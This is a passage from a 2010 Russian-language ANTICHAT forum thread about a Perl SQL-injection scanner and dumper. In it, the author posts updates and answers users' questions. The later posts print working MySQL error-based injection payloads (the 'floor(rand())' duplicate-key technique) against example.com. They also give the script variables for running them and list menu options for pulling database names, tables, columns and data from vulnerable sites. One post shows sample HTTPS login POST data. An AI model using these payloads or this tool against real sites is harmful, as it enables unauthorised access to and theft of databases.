ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.02.2010, 01:24
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Получил ссылку в личку, там уникальный (читай - доселе неприсутствувавший) в scaner_error_list.txt текст, а именно:
404 - страница не найдена
метод GET, все прекрасно сканится, т.е. надо понимать буквально - 100% совпадение того, что в исходниках на странице-идентификаторе неверного запроса, и того, что в scaner_error_list.txt
PS: Чтобы понять, о чем я - открой scaner_error_list.txt, CTRL+F и "404 - страница не найдена" - такой ошибки там по дефолту нет, поэтому и не сканилось.
Т.е. решение - просто вставь в scaner_error_list.txt новую строчку - 404 - страница не найдена, метод GET, и все будет ок
Это инструмент, мощный инструмент, но никак не AI
Последний раз редактировалось Pashkela; 14.02.2010 в 01:30..
|
|
|
14.02.2010, 01:30
|
|
Познающий
Регистрация: 18.01.2007
Сообщений: 63
Провел на форуме:
292941
Репутация:
27
|
|
в scaner_error_list.txt я сразу вписал ошибку.... с методом протупил...
|
|
|
|
15.02.2010, 02:19
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
прошу добавит фунцию типа select ... from ... where table_shema... тоесть не тока с текушего бд но и от остальных
|
|
|
|
15.02.2010, 02:31
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
в MySQL уже давным-давно добавлено
update:
NAME_CONST - get DB-names from information_schema.schemata
NAME_CONST - get tables from DB-name
NAME_CONST - get column_name from tables from DB-name
Последний раз редактировалось Pashkela; 15.02.2010 в 04:36..
|
|
|
|
15.02.2010, 13:49
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
Pashkela, прога как то странно себя ведет когда в нескольких базах уязвимого сайта есть таблицы с одним и тем же названием...тулза дампит данные только из какой-то одной...возможность выбора отсутствует...
З.Ы переход на gui всё-таки не планируется?
Последний раз редактировалось daniel_1024; 15.02.2010 в 13:58..
|
|
|
|
15.02.2010, 13:53
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от Pashkela
в MySQL уже давным-давно добавлено
update:
NAME_CONST - get DB-names from information_schema.schemata
NAME_CONST - get tables from DB-name
NAME_CONST - get column_name from tables from DB-name
ой сорри я сам не обновился ))
|
|
|
|
15.02.2010, 15:41
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от daniel_1024
Pashkela, прога как то странно себя ведет когда в нескольких базах уязвимого сайта есть таблицы с одним и тем же названием...тулза дампит данные только из какой-то одной...возможность выбора отсутствует...
З.Ы переход на gui всё-таки не планируется?
синтаксис такой
ИМЯ_БД.ИМЯ_ТАБЛИЦЫ - и будет дампить откуда надо, если речь про пункт 7
когда спросит Mysql=>5 если уже есть имя БД, то надо выбрать 0 (нет), чтобы не переопределяло имя базы (делается автоматически)
gui не планируется
UPDATE (17.02.2010):
устранение серьезных багов по всему коду, код стал более стабильный и универсальный, перекачать в первом посте
Последний раз редактировалось Pashkela; 17.02.2010 в 19:49..
|
|
|
|
21.02.2010, 22:18
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
Pashkela, можешь переделать алгоритм сканера сайтов - чтобы он проходил по какому-то несуществующему адресу, тем самым узнавая дефолтную 404 страницу для сканируемого сайта, а затем уже сравнивал с нею всё остальное...тогда и файл с ошибками не нужен будет...
|
|
|
|
24.02.2010, 02:33
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
update:
Для всех режимов работы - поддержка HTTPS+Authorization
сделано на IO::Socket::SSL
UBUNTU: sudo apt-get install libio-socket-ssl-perl
WIN: install Net::SSLeay and IO::Socket::SSL
+ раскоментировать строчку 48
новые переменные:
$https_mode_auth = 1; # 1 - если нужна авторизация, 0 - нет
$https_auth_script_path = "/login.php"; # путь до скрипта авторизации (начинается со слеша)
$https_auth_post_data = "username=admin&passwd=sex"; # логин, пароль, название полей и etc., взять можно из Tamper Data (FireFox plugin) при авторизации на ресурсе
автоматическое распознавание url, если https и авторегистрация, если есть данные
|
|
|
|
24.02.2010, 18:48
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
update:
MySql inj floor(rand()):
Названо просто от балды, еще одна альтернатива Blind Mysql injection, но уже для 4.1<=Mysql=>5, т.к. использует стандартные функции для старых версий (можно сказать альтернатива name_const), основано на вызове той же ошибки Duplicate
- Многопоточный
- Post/Get/Cookies/Proxy & etc.
- Все те же возможности, что и при обычной скуле + та же скорость
скуля:
Код:
http://example.com/?id=1+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+
переменные в скрипте:
Код:
$f_table = "information_schema.tables"; # default 'information_schema.tables' if MySQL>=5 and if MySQL<5 - you must brute table_name before and print here
$f_url = "http://example.com/?id=1+or(1,2)="; # url
$f_plus = "+"; # %20,%2b & etc.
$f_filtr = "--+"; # close SQL
PS: Приведу еще один пример, некоторые просто не вполне понимают возможности:
скуля:
Код:
http://example.com/?id=(select+1+from+(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)a)--+
переменные в скрипте:
Код:
$f_table = "information_schema.tables"; # default 'information_schema.tables' if MySQL>=5 and if MySQL<5 - you must brute table_name before and print here
$f_url = "http://example.com/?id=(select+1+from+"; # url
$f_plus = "+"; # %20,%2b & etc.
$f_filtr = "a)--+"; # close SQL
[1] floor(rand()) - system information\n";
[2] floor(rand()) - get DB-names from information_schema.schemata\n";
[3] floor(rand()) - get tables from DB-name\n";
[4] floor(rand()) - get column_name from tables from DB-name\n";
[5] floor(rand()) - get tables from information_schema (current DB)\n";
[6] floor(rand()) - get column_name from table (current DB)\n";
[7] floor(rand()) - get data from columns\n";
[8] floor(rand()) - Mysql4 inj brute tables and columns\n";
теперь с blind mysql4 можно работать как с обычной скулей
Обновления в первом посте темы как обычно
PS: + исправление мелких багов
update 28.02.2010 - фикс багов
Последний раз редактировалось Pashkela; 02.03.2010 в 03:01..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
